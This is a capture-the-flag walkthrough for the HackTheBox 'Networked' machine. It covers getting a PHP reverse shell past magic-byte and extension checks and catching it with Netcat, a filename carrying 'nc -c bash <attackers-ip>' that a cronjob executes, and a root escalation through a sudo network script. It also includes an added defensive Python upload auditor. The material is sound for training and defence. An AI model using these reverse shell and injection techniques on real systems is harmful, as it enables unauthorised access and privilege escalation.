HackTheBox [HTB] - Networked

Concepts:

  1. Trick the MIME type checking PHP scripts
  2. Basic command injection
  3. Use a privileged script to exploit an issue with the parameters set in the files in network-scripts

I have included a few resource links in the references section for beginners to get started with.


Recon :

The initial recon starts with nmap, which gives the likely places to start.
    

    
Gobuster turned up a few directories, of which the backup folder seemed interesting. It had the source of the PHP scripts running on the system.

Examining lib.php shows PHP functions including finfo_open(FILEINFO_MIME) and @mime_content_type. These functions use the magic bytes at the start of a file to detect its type.

This check can be tricked by adding a magic header such as "GIF89a;" to the reverse shell.

Gobuster also revealed pages such as "uploads.php" and "photos.php". Go to the uploads.php page and upload any JPG or GIF picture (make sure to add php to the file name, i.e. file.php.jpg), and capture the traffic in Burp Suite before it leaves the attacker's machine.

Leave the first 2 lines in the request and replace the other lines in the request body with the PHP reverse shell code. The reverse shell file should then be uploaded, having bypassed the extension and file type (magic header) validations.




Go to <attackers-ip>/photos.php and check the uploaded file. Start the Netcat listener and execute the uploaded reverse shell by requesting the URL <attackers-ip>/uploads/<uploaded_File_name>.php.jpg




Reverse Shell & User Flag:


We found a user, 'guly', and a cronjob invoked by that user is running. We can exploit it to escalate to guly's privileges using the following command.


touch /var/www/html/uploads/\;nc \-c\ bash <attackers-ip>\ <attacker-port>

The above command will create a file named "; nc -c bash <attackers-ip> <attacker-port>".


When the cronjob runs, it takes the file name as an argument and executes it. Start a Netcat listener and wait for the reverse connection.
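
A defender's view of the two tricks above (the "GIF89a;" header on a file named file.php.jpg, and the file name that carries a shell command), as an added example that is not part of the original write-up: a Python audit of stored uploads. The function name, extension sets and sample bytes are constructed for illustration.

```python
import re

# Added example: names, sets and sample data below are constructed for illustration.
PHP_SEGMENTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
MAGIC = {  # final extension -> accepted leading bytes
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def audit_upload(name: str, data: bytes) -> list[str]:
    """Return the reasons a stored upload looks unsafe (empty list = clean)."""
    findings = []
    segments = name.lower().split(".")
    # file.php.jpg: a PHP segment anywhere in the name can still reach the
    # PHP handler on some server configurations, as the upload here did.
    if any(seg in PHP_SEGMENTS for seg in segments[1:]):
        findings.append("php-segment-in-name")
    # Names later handed to a shell must not carry ';', spaces, quotes, etc.
    if not SAFE_NAME.fullmatch(name):
        findings.append("unsafe-characters-in-name")
    # Magic bytes must agree with the final extension...
    expected = MAGIC.get(segments[-1])
    if expected is None or not data.startswith(expected):
        findings.append("magic-extension-mismatch")
    # ...but a valid signature proves nothing about the rest of the file.
    if b"<?php" in data.lower() or b"<?=" in data:
        findings.append("php-tag-in-body")
    return findings


# Constructed samples mirroring the cases in this write-up.
SAMPLES = {
    "cat.gif": b"GIF89a" + b"\x01\x00\x01\x00\x00\x00\x00;",
    "file.php.jpg": b"GIF89a;\n<?php /* placeholder body */ ?>",
    "; nc -c bash <attackers-ip> <attacker-port>": b"",
}

if __name__ == "__main__":
    for sample_name, body in SAMPLES.items():
        print(repr(sample_name), audit_upload(sample_name, body))
```

The same checks belong at upload time as well: rejecting a name or body that produces any finding stops both the web shell and the cron-side command injection before anything is written to the uploads folder.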



*WE CAN READ THE USER FLAG FROM GULY'S HOME DIRECTORY



Root Flag:


After enumerating the victim machine for some time, we found a shell script that runs with sudo.

/usr/local/sbin/changename.sh

The script asks for some inputs and uses network-scripts, which has a privilege escalation vulnerability (for more details, check the References section).

To exploit the vulnerability, run the script and, for "interface NAME", enter

"anystring <space> /bin/bash". Enter a random value for the remaining parameters and press Enter to get root access.



*WE CAN READ THE ROOT FLAG FROM THE ROOT DIRECTORY

References :

